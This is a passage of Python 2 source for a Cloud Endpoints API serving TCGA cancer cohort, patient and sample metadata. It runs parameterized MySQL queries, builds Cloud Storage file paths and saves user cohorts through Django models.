@endpoints.method(GET_RESOURCE, CohortPatientsSamplesList,
path='cohort_patients_samples_list', http_method='GET',
name='cohorts.cohort_patients_samples_list')
def cohort_patients_samples_list(self, request):
"""
Takes a cohort id as a required parameter and returns information about the participants
and samples in a particular cohort. Authentication is required.
User must have either READER or OWNER permissions on the cohort.
"""
db = None
cursor = None
user_email = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
            except (ObjectDoesNotExist, MultipleObjectsReturned) as e:
logger.warn(e)
request_finished.send(self)
raise endpoints.UnauthorizedException("%s does not have an entry in the user database." % user_email)
cohort_perms_query = "select count(*) from cohorts_cohort_perms where user_id=%s and cohort_id=%s"
cohort_perms_tuple = (user_id, cohort_id)
cohort_query = "select count(*) from cohorts_cohort where id=%s and active=%s"
cohort_tuple = (cohort_id, unicode('0'))
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(cohort_perms_query, cohort_perms_tuple)
result = cursor.fetchone()
if int(result['count(*)']) == 0:
error_message = "{} does not have owner or reader permissions on cohort {}.".format(user_email, cohort_id)
request_finished.send(self)
raise endpoints.ForbiddenException(error_message)
cursor.execute(cohort_query, cohort_tuple)
result = cursor.fetchone()
if int(result['count(*)']) > 0:
error_message = "Cohort {} was deleted.".format(cohort_id)
request_finished.send(self)
raise endpoints.NotFoundException(error_message)
except (IndexError, TypeError) as e:
logger.warn(e)
raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tcohort permissions query: {} {}\n\tcohort query: {} {}'\
.format(e, cohort_perms_query, cohort_perms_tuple, cohort_query, cohort_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving cohorts or cohort permissions. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
patient_query_str = 'select cohorts_patients.patient_id ' \
'from cohorts_patients ' \
'inner join cohorts_cohort_perms ' \
'on cohorts_cohort_perms.cohort_id=cohorts_patients.cohort_id ' \
'inner join cohorts_cohort ' \
'on cohorts_patients.cohort_id=cohorts_cohort.id ' \
'where cohorts_patients.cohort_id=%s ' \
'and cohorts_cohort_perms.user_id=%s ' \
'and cohorts_cohort.active=%s ' \
'group by cohorts_patients.patient_id '
patient_query_tuple = (cohort_id, user_id, unicode('1'))
sample_query_str = 'select cohorts_samples.sample_id ' \
'from cohorts_samples ' \
'inner join cohorts_cohort_perms ' \
'on cohorts_cohort_perms.cohort_id=cohorts_samples.cohort_id ' \
'inner join cohorts_cohort ' \
'on cohorts_samples.cohort_id=cohorts_cohort.id ' \
'where cohorts_samples.cohort_id=%s ' \
'and cohorts_cohort_perms.user_id=%s ' \
'and cohorts_cohort.active=%s ' \
'group by cohorts_samples.sample_id '
sample_query_tuple = (cohort_id, user_id, unicode('1'))
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(patient_query_str, patient_query_tuple)
patient_data = []
for row in cursor.fetchall():
patient_data.append(row['patient_id'])
cursor.execute(sample_query_str, sample_query_tuple)
sample_data = []
for row in cursor.fetchall():
sample_data.append(row['sample_id'])
return CohortPatientsSamplesList(patients=patient_data,
patient_count=len(patient_data),
samples=sample_data,
sample_count=len(sample_data),
cohort_id=int(cohort_id))
except (IndexError, TypeError) as e:
logger.warn(e)
raise endpoints.NotFoundException("Cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, patient_query_tuple, sample_query_str, sample_query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving patients or samples. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(patient_barcode=messages.StringField(1, required=True))
@endpoints.method(GET_RESOURCE, PatientDetails,
path='patient_details', http_method='GET', name='cohorts.patient_details')
def patient_details(self, request):
"""
Returns information about a specific participant,
including a list of samples and aliquots derived from this patient.
Takes a participant barcode (of length 12, *eg* TCGA-B9-7268) as a required parameter.
User does not need to be authenticated.
"""
clinical_cursor = None
sample_cursor = None
aliquot_cursor = None
db = None
patient_barcode = request.get_assigned_value('patient_barcode')
        clinical_query_str = 'select * ' \
                             'from metadata_clinical ' \
                             'where ParticipantBarcode=%s'
query_tuple = (str(patient_barcode),)
sample_query_str = 'select SampleBarcode ' \
'from metadata_biospecimen ' \
'where ParticipantBarcode=%s'
aliquot_query_str = 'select AliquotBarcode ' \
'from metadata_data ' \
'where ParticipantBarcode=%s ' \
'group by AliquotBarcode'
try:
db = sql_connection()
clinical_cursor = db.cursor(MySQLdb.cursors.DictCursor)
clinical_cursor.execute(clinical_query_str, query_tuple)
row = clinical_cursor.fetchone()
item = MetadataItem(
age_at_initial_pathologic_diagnosis=None if "age_at_initial_pathologic_diagnosis" not in row or row["age_at_initial_pathologic_diagnosis"] is None else int(row["age_at_initial_pathologic_diagnosis"]),
anatomic_neoplasm_subdivision=str(row["anatomic_neoplasm_subdivision"]),
batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]),
bcr=str(row["bcr"]),
clinical_M=str(row["clinical_M"]),
clinical_N=str(row["clinical_N"]),
clinical_stage=str(row["clinical_stage"]),
clinical_T=str(row["clinical_T"]),
colorectal_cancer=str(row["colorectal_cancer"]),
country=str(row["country"]),
days_to_birth=None if "days_to_birth" not in row or row['days_to_birth'] is None else int(row["days_to_birth"]),
days_to_death=None if "days_to_death" not in row or row['days_to_death'] is None else int(row["days_to_death"]),
days_to_initial_pathologic_diagnosis=None if "days_to_initial_pathologic_diagnosis" not in row or row['days_to_initial_pathologic_diagnosis'] is None else int(row["days_to_initial_pathologic_diagnosis"]),
days_to_last_followup=None if "days_to_last_followup" not in row or row['days_to_last_followup'] is None else int(row["days_to_last_followup"]),
days_to_submitted_specimen_dx=None if "days_to_submitted_specimen_dx" not in row or row['days_to_submitted_specimen_dx'] is None else int(row["days_to_submitted_specimen_dx"]),
Study=str(row["Study"]),
ethnicity=str(row["ethnicity"]),
frozen_specimen_anatomic_site=str(row["frozen_specimen_anatomic_site"]),
gender=str(row["gender"]),
height=None if "height" not in row or row['height'] is None else int(row["height"]),
histological_type=str(row["histological_type"]),
history_of_colon_polyps=str(row["history_of_colon_polyps"]),
history_of_neoadjuvant_treatment=str(row["history_of_neoadjuvant_treatment"]),
history_of_prior_malignancy=str(row["history_of_prior_malignancy"]),
hpv_calls=str(row["hpv_calls"]),
hpv_status=str(row["hpv_status"]),
icd_10=str(row["icd_10"]),
icd_o_3_histology=str(row["icd_o_3_histology"]),
icd_o_3_site=str(row["icd_o_3_site"]),
lymphatic_invasion=str(row["lymphatic_invasion"]),
lymphnodes_examined=str(row["lymphnodes_examined"]),
lymphovascular_invasion_present=str(row["lymphovascular_invasion_present"]),
menopause_status=str(row["menopause_status"]),
mononucleotide_and_dinucleotide_marker_panel_analysis_status=str(row["mononucleotide_and_dinucleotide_marker_panel_analysis_status"]),
mononucleotide_marker_panel_analysis_status=str(row["mononucleotide_marker_panel_analysis_status"]),
neoplasm_histologic_grade=str(row["neoplasm_histologic_grade"]),
new_tumor_event_after_initial_treatment=str(row["new_tumor_event_after_initial_treatment"]),
number_of_lymphnodes_examined=None if "number_of_lymphnodes_examined" not in row or row['number_of_lymphnodes_examined'] is None else int(row["number_of_lymphnodes_examined"]),
number_of_lymphnodes_positive_by_he=None if "number_of_lymphnodes_positive_by_he" not in row or row['number_of_lymphnodes_positive_by_he'] is None else int(row["number_of_lymphnodes_positive_by_he"]),
ParticipantBarcode=str(row["ParticipantBarcode"]),
pathologic_M=str(row["pathologic_M"]),
pathologic_N=str(row["pathologic_N"]),
pathologic_stage=str(row["pathologic_stage"]),
pathologic_T=str(row["pathologic_T"]),
person_neoplasm_cancer_status=str(row["person_neoplasm_cancer_status"]),
pregnancies=str(row["pregnancies"]),
primary_neoplasm_melanoma_dx=str(row["primary_neoplasm_melanoma_dx"]),
primary_therapy_outcome_success=str(row["primary_therapy_outcome_success"]),
prior_dx=str(row["prior_dx"]),
Project=str(row["Project"]),
psa_value=None if "psa_value" not in row or row["psa_value"] is None else float(row["psa_value"]),
race=str(row["race"]),
residual_tumor=str(row["residual_tumor"]),
tobacco_smoking_history=str(row["tobacco_smoking_history"]),
tumor_tissue_site=str(row["tumor_tissue_site"]),
tumor_type=str(row["tumor_type"]),
weiss_venous_invasion=str(row["weiss_venous_invasion"]),
vital_status=str(row["vital_status"]),
weight=None if "weight" not in row or row["weight"] is None else int(float(row["weight"])),
year_of_initial_pathologic_diagnosis=str(row["year_of_initial_pathologic_diagnosis"])
)
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, query_tuple)
sample_data = []
for row in sample_cursor.fetchall():
sample_data.append(row['SampleBarcode'])
aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor)
aliquot_cursor.execute(aliquot_query_str, query_tuple)
aliquot_data = []
for row in aliquot_cursor.fetchall():
aliquot_data.append(row['AliquotBarcode'])
return PatientDetails(clinical_data=item, samples=sample_data, aliquots=aliquot_data)
        except (IndexError, TypeError) as e:
logger.info("Patient {} not found. Error: {}".format(patient_barcode, e))
raise endpoints.NotFoundException("Patient {} not found.".format(patient_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}\n\taliquot query: {} {}'\
.format(e, clinical_query_str, query_tuple, sample_query_str, query_tuple,
aliquot_query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving patient, sample, or aliquot data. {}".format(msg))
finally:
if clinical_cursor: clinical_cursor.close()
if sample_cursor: sample_cursor.close()
if aliquot_cursor: aliquot_cursor.close()
if db and db.open: db.close()
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True),
platform=messages.StringField(2),
pipeline=messages.StringField(3))
@endpoints.method(GET_RESOURCE, SampleDetails,
path='sample_details', http_method='GET', name='cohorts.sample_details')
def sample_details(self, request):
"""
Given a sample barcode (of length 16, *eg* TCGA-B9-7268-01A), this endpoint returns
all available "biospecimen" information about this sample,
the associated patient barcode, a list of associated aliquots,
and a list of "data_details" blocks describing each of the data files associated with this sample
"""
biospecimen_cursor = None
aliquot_cursor = None
patient_cursor = None
data_cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
biospecimen_query_str = 'select * ' \
'from metadata_biospecimen ' \
'where SampleBarcode=%s'
query_tuple = (str(sample_barcode),)
extra_query_tuple = query_tuple
aliquot_query_str = 'select AliquotBarcode ' \
'from metadata_data ' \
'where SampleBarcode=%s '
patient_query_str = 'select ParticipantBarcode ' \
'from metadata_biospecimen ' \
'where SampleBarcode=%s '
data_query_str = 'select ' \
'SampleBarcode, ' \
'DataCenterName, ' \
'DataCenterType, ' \
'DataFileName, ' \
'DataFileNameKey, ' \
'DatafileUploaded, ' \
'DataLevel,' \
'Datatype,' \
'GenomeReference,' \
'GG_dataset_id, ' \
'GG_readgroupset_id, ' \
'Pipeline,' \
'Platform,' \
'platform_full_name,' \
'Project,' \
'Repository,' \
'SDRFFileName,' \
'SecurityProtocol ' \
'from metadata_data ' \
'where SampleBarcode=%s '
if request.get_assigned_value('platform') is not None:
platform = request.get_assigned_value('platform')
aliquot_query_str += ' and platform=%s '
data_query_str += ' and platform=%s '
extra_query_tuple += (str(platform),)
if request.get_assigned_value('pipeline') is not None:
pipeline = request.get_assigned_value('pipeline')
aliquot_query_str += ' and pipeline=%s '
data_query_str += ' and pipeline=%s '
extra_query_tuple += (str(pipeline),)
aliquot_query_str += ' group by AliquotBarcode'
patient_query_str += ' group by ParticipantBarcode'
try:
db = sql_connection()
biospecimen_cursor = db.cursor(MySQLdb.cursors.DictCursor)
biospecimen_cursor.execute(biospecimen_query_str, query_tuple)
row = biospecimen_cursor.fetchone()
item = MetadataItem(
avg_percent_lymphocyte_infiltration=None if "avg_percent_lymphocyte_infiltration" not in row or row["avg_percent_lymphocyte_infiltration"] is None else float(row["avg_percent_lymphocyte_infiltration"]),
avg_percent_monocyte_infiltration=None if "avg_percent_monocyte_infiltration" not in row or row["avg_percent_monocyte_infiltration"] is None else float(row["avg_percent_monocyte_infiltration"]),
avg_percent_necrosis=None if "avg_percent_necrosis" not in row or row["avg_percent_necrosis"] is None else float(row["avg_percent_necrosis"]),
avg_percent_neutrophil_infiltration=None if "avg_percent_neutrophil_infiltration" not in row or row["avg_percent_neutrophil_infiltration"] is None else float(row["avg_percent_neutrophil_infiltration"]),
avg_percent_normal_cells=None if "avg_percent_normal_cells" not in row or row["avg_percent_normal_cells"] is None else float(row["avg_percent_normal_cells"]),
avg_percent_stromal_cells=None if "avg_percent_stromal_cells" not in row or row["avg_percent_stromal_cells"] is None else float(row["avg_percent_stromal_cells"]),
avg_percent_tumor_cells=None if "avg_percent_tumor_cells" not in row or row["avg_percent_tumor_cells"] is None else float(row["avg_percent_tumor_cells"]),
avg_percent_tumor_nuclei=None if "avg_percent_tumor_nuclei" not in row or row["avg_percent_tumor_nuclei"] is None else float(row["avg_percent_tumor_nuclei"]),
batch_number=None if "batch_number" not in row or row["batch_number"] is None else int(row["batch_number"]),
bcr=str(row["bcr"]),
days_to_collection=None if "days_to_collection" not in row or row['days_to_collection'] is None else int(row["days_to_collection"]),
max_percent_lymphocyte_infiltration=None if "max_percent_lymphocyte_infiltration" not in row or row["max_percent_lymphocyte_infiltration"] is None else int(row["max_percent_lymphocyte_infiltration"]), # 46)
max_percent_monocyte_infiltration=None if "max_percent_monocyte_infiltration" not in row or row["max_percent_monocyte_infiltration"] is None else int(row["max_percent_monocyte_infiltration"]), # 47)
max_percent_necrosis=None if "max_percent_necrosis" not in row or row["max_percent_necrosis"] is None else int(row["max_percent_necrosis"]), # 48)
max_percent_neutrophil_infiltration=None if "max_percent_neutrophil_infiltration" not in row or row["max_percent_neutrophil_infiltration"] is None else int(row["max_percent_neutrophil_infiltration"]), # 49)
max_percent_normal_cells=None if "max_percent_normal_cells" not in row or row["max_percent_normal_cells"] is None else int(row["max_percent_normal_cells"]), # 50)
max_percent_stromal_cells=None if "max_percent_stromal_cells" not in row or row["max_percent_stromal_cells"] is None else int(row["max_percent_stromal_cells"]), # 51)
max_percent_tumor_cells=None if "max_percent_tumor_cells" not in row or row["max_percent_tumor_cells"] is None else int(row["max_percent_tumor_cells"]), # 52)
max_percent_tumor_nuclei=None if "max_percent_tumor_nuclei" not in row or row["max_percent_tumor_nuclei"] is None else int(row["max_percent_tumor_nuclei"]), # 53)
min_percent_lymphocyte_infiltration=None if "min_percent_lymphocyte_infiltration" not in row or row["min_percent_lymphocyte_infiltration"] is None else int(row["min_percent_lymphocyte_infiltration"]), # 55)
min_percent_monocyte_infiltration=None if "min_percent_monocyte_infiltration" not in row or row["min_percent_monocyte_infiltration"] is None else int(row["min_percent_monocyte_infiltration"]), # 56)
min_percent_necrosis=None if "min_percent_necrosis" not in row or row["min_percent_necrosis"] is None else int(row["min_percent_necrosis"]), # 57)
min_percent_neutrophil_infiltration=None if "min_percent_neutrophil_infiltration" not in row or row["min_percent_neutrophil_infiltration"] is None else int(row["min_percent_neutrophil_infiltration"]), # 58)
min_percent_normal_cells=None if "min_percent_normal_cells" not in row or row["min_percent_normal_cells"] is None else int(row["min_percent_normal_cells"]), # 59)
min_percent_stromal_cells=None if "min_percent_stromal_cells" not in row or row["min_percent_stromal_cells"] is None else int(row["min_percent_stromal_cells"]), # 60)
min_percent_tumor_cells=None if "min_percent_tumor_cells" not in row or row["min_percent_tumor_cells"] is None else int(row["min_percent_tumor_cells"]), # 61)
min_percent_tumor_nuclei=None if "min_percent_tumor_nuclei" not in row or row["min_percent_tumor_nuclei"] is None else int(row["min_percent_tumor_nuclei"]), # 62)
ParticipantBarcode=str(row["ParticipantBarcode"]),
Project=str(row["Project"]),
SampleBarcode=str(row["SampleBarcode"]),
Study=str(row["Study"])
)
aliquot_cursor = db.cursor(MySQLdb.cursors.DictCursor)
aliquot_cursor.execute(aliquot_query_str, extra_query_tuple)
aliquot_data = []
for row in aliquot_cursor.fetchall():
aliquot_data.append(row['AliquotBarcode'])
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, query_tuple)
row = patient_cursor.fetchone()
if row is None:
aliquot_cursor.close()
patient_cursor.close()
biospecimen_cursor.close()
db.close()
error_message = "Sample barcode {} not found in metadata_biospecimen table.".format(sample_barcode)
return SampleDetails(biospecimen_data=None, aliquots=[], patient=None, data_details=[],
data_details_count=None, error=error_message)
patient_barcode = str(row["ParticipantBarcode"])
data_cursor = db.cursor(MySQLdb.cursors.DictCursor)
data_cursor.execute(data_query_str, extra_query_tuple)
data_data = []
bad_repo_count = 0
bad_repo_set = set()
for row in data_cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
cloud_storage_path = "gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey'))
else: # not filtering on dbGaP_authorized:
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
bad_repo_count += 1
bad_repo_set.add(row['Repository'])
continue
cloud_storage_path = "gs://{}{}".format(bucket_name, row.get('DataFileNameKey'))
data_item = DataDetails(
SampleBarcode=str(row['SampleBarcode']),
DataCenterName=str(row['DataCenterName']),
DataCenterType=str(row['DataCenterType']),
DataFileName=str(row['DataFileName']),
DataFileNameKey=str(row.get('DataFileNameKey')),
DatafileUploaded=str(row['DatafileUploaded']),
DataLevel=str(row['DataLevel']),
Datatype=str(row['Datatype']),
GenomeReference=str(row['GenomeReference']),
GG_dataset_id=str(row['GG_dataset_id']),
GG_readgroupset_id=str(row['GG_readgroupset_id']),
Pipeline=str(row['Pipeline']),
Platform=str(row['Platform']),
platform_full_name=str(row['platform_full_name']),
Project=str(row['Project']),
Repository=str(row['Repository']),
SDRFFileName=str(row['SDRFFileName']),
SecurityProtocol=str(row['SecurityProtocol']),
CloudStoragePath=cloud_storage_path
)
data_data.append(data_item)
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return SampleDetails(biospecimen_data=item, aliquots=aliquot_data,
patient=patient_barcode, data_details=data_data,
data_details_count=len(data_data))
except (IndexError, TypeError) as e:
logger.info("Sample details for barcode {} not found. Error: {}".format(sample_barcode, e))
raise endpoints.NotFoundException(
"Sample details for barcode {} not found.".format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tbiospecimen query: {} {}\n\tpatient query: {} {}\n\tdata query: {} {}'\
.format(e, biospecimen_query_str, query_tuple, patient_query_str, query_tuple,
data_query_str, extra_query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving biospecimen, patient, or other data. {}".format(msg))
finally:
if biospecimen_cursor: biospecimen_cursor.close()
if aliquot_cursor: aliquot_cursor.close()
if patient_cursor: patient_cursor.close()
if data_cursor: data_cursor.close()
if db and db.open: db.close()
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
limit=messages.IntegerField(2),
platform=messages.StringField(3),
pipeline=messages.StringField(4),
token=messages.StringField(5))
@endpoints.method(GET_RESOURCE, DataFileNameKeyList,
path='datafilenamekey_list_from_cohort', http_method='GET',
name='cohorts.datafilenamekey_list_from_cohort')
def datafilenamekey_list_from_cohort(self, request):
"""
Takes a cohort id as a required parameter and returns cloud storage paths to files
associated with all the samples in that cohort, up to a default limit of 10,000 files.
Authentication is required. User must have READER or OWNER permissions on the cohort.
"""
user_email = None
cursor = None
db = None
limit = request.get_assigned_value('limit')
platform = request.get_assigned_value('platform')
pipeline = request.get_assigned_value('pipeline')
cohort_id = request.get_assigned_value('cohort_id')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \
'FROM metadata_data '
try:
user_id = Django_User.objects.get(email=user_email).id
django_cohort = Django_Cohort.objects.get(id=cohort_id)
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e)
if 'Cohort_Perms' in e.message:
err_msg = "User {} does not have permissions on cohort {}. Error: {}"\
.format(user_email, cohort_id, e)
request_finished.send(self)
raise endpoints.UnauthorizedException(err_msg)
query_str += 'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \
'WHERE cohorts_samples.cohort_id=%s ' \
'AND DataFileNameKey != "" AND DataFileNameKey is not null '
query_tuple = (cohort_id,)
if platform:
query_str += ' and metadata_data.Platform=%s '
query_tuple += (platform,)
if pipeline:
query_str += ' and metadata_data.Pipeline=%s '
query_tuple += (pipeline,)
query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository '
if limit is None:
query_str += ' LIMIT 10000'
else:
query_str += ' LIMIT %s'
query_tuple += (limit,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
datafilenamekeys = []
bad_repo_count = 0
bad_repo_set = set()
for row in cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey')))
else: # not filtering on dbGaP_authorized
bucket_name = ''
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
bad_repo_count += 1
bad_repo_set.add(row['Repository'])
continue
datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey')))
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("File paths for cohort {} not found.".format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True),
platform=messages.StringField(2),
pipeline=messages.StringField(3))
@endpoints.method(GET_RESOURCE, DataFileNameKeyList,
path='datafilenamekey_list_from_sample', http_method='GET', name='cohorts.datafilenamekey_list_from_sample')
def datafilenamekey_list_from_sample(self, request):
"""
Takes a sample barcode as a required parameter and
returns cloud storage paths to files associated with that sample.
"""
cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
platform = request.get_assigned_value('platform')
pipeline = request.get_assigned_value('pipeline')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
query_str = 'SELECT DataFileNameKey, SecurityProtocol, Repository ' \
'FROM metadata_data WHERE SampleBarcode=%s '
query_tuple = (sample_barcode,)
if platform:
query_str += ' and Platform=%s '
query_tuple += (platform,)
if pipeline:
query_str += ' and Pipeline=%s '
query_tuple += (pipeline,)
query_str += ' GROUP BY DataFileNameKey, SecurityProtocol, Repository'
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
datafilenamekeys = []
bad_repo_count = 0
bad_repo_set = set()
for row in cursor.fetchall():
if not row.get('DataFileNameKey'):
continue
if 'controlled' not in str(row['SecurityProtocol']).lower():
datafilenamekeys.append("gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey')))
else: # not filtering on dbGaP_authorized
bucket_name = ''
if row['Repository'].lower() == 'dcc':
bucket_name = settings.DCC_CONTROLLED_DATA_BUCKET
elif row['Repository'].lower() == 'cghub':
bucket_name = settings.CGHUB_CONTROLLED_DATA_BUCKET
else: # shouldn't ever happen
                        bad_repo_count += 1
bad_repo_set.add(row['Repository'])
continue
datafilenamekeys.append("gs://{}{}".format(bucket_name, row.get('DataFileNameKey')))
if bad_repo_count > 0:
logger.warn("not returning {count} row(s) in sample_details due to repositories: {bad_repo_list}"
.format(count=bad_repo_count, bad_repo_list=list(bad_repo_set)))
return DataFileNameKeyList(datafilenamekeys=datafilenamekeys, count=len(datafilenamekeys))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("File paths for sample {} not found.".format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\t query: {} {}'.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving file paths. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem,
name=messages.StringField(2, required=True),
token=messages.StringField(3)
)
@endpoints.method(POST_RESOURCE, Cohort,
path='save_cohort', http_method='POST', name='cohorts.save')
def save_cohort(self, request):
"""
Creates and saves a cohort. Takes a JSON object in the request body to use as the cohort's filters.
Authentication is required.
Returns information about the saved cohort, including the number of patients and the number
of samples in that cohort.
"""
user_email = None
patient_cursor = None
sample_cursor = None
db = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
try:
django_user = Django_User.objects.get(email=user_email)
user_id = django_user.id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
request_finished.send(self)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
query_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
                and k.name != 'name' and k.name != 'token'
}
if are_there_bad_keys(request) or are_there_no_acceptable_keys(request):
err_msg = construct_parameter_error_message(request, True)
request_finished.send(self)
raise endpoints.BadRequestException(err_msg)
patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \
'AS ParticipantBarcode ' \
'FROM metadata_samples '
sample_query_str = 'SELECT SampleBarcode ' \
'FROM metadata_samples '
value_tuple = ()
if len(query_dict) > 0:
where_clause = build_where_clause(query_dict)
patient_query_str += ' WHERE ' + where_clause['query_str']
sample_query_str += ' WHERE ' + where_clause['query_str']
value_tuple = where_clause['value_tuple']
sample_query_str += ' GROUP BY SampleBarcode'
patient_barcodes = []
sample_barcodes = []
try:
db = sql_connection()
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, value_tuple)
for row in patient_cursor.fetchall():
patient_barcodes.append(row['ParticipantBarcode'])
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, value_tuple)
for row in sample_cursor.fetchall():
sample_barcodes.append(row['SampleBarcode'])
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("Error retrieving samples or patients")
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, value_tuple, sample_query_str, value_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error saving cohort. {}".format(msg))
finally:
if patient_cursor: patient_cursor.close()
if sample_cursor: sample_cursor.close()
if db and db.open: db.close()
request_finished.send(self)
cohort_name = request.get_assigned_value('name')
# 1. create new cohorts_cohort with name, active=True, last_date_saved=now
created_cohort = Django_Cohort.objects.create(name=cohort_name, active=True, last_date_saved=datetime.utcnow())
created_cohort.save()
# 2. insert patients into cohort_patients
patient_barcodes = list(set(patient_barcodes))
patient_list = [Patients(cohort=created_cohort, patient_id=patient_code) for patient_code in patient_barcodes]
Patients.objects.bulk_create(patient_list)
# 3. insert samples into cohort_samples
sample_barcodes = list(set(sample_barcodes))
sample_list = [Samples(cohort=created_cohort, sample_id=sample_code) for sample_code in sample_barcodes]
Samples.objects.bulk_create(sample_list)
# 4. Set permission for user to be owner
perm = Cohort_Perms(cohort=created_cohort, user=django_user, perm=Cohort_Perms.OWNER)
perm.save()
# 5. Create filters applied
for key, val in query_dict.items():
Filters.objects.create(resulting_cohort=created_cohort, name=key, value=val).save()
# 6. Store cohort to BigQuery
project_id = settings.BQ_PROJECT_ID
cohort_settings = settings.GET_BQ_COHORT_SETTINGS()
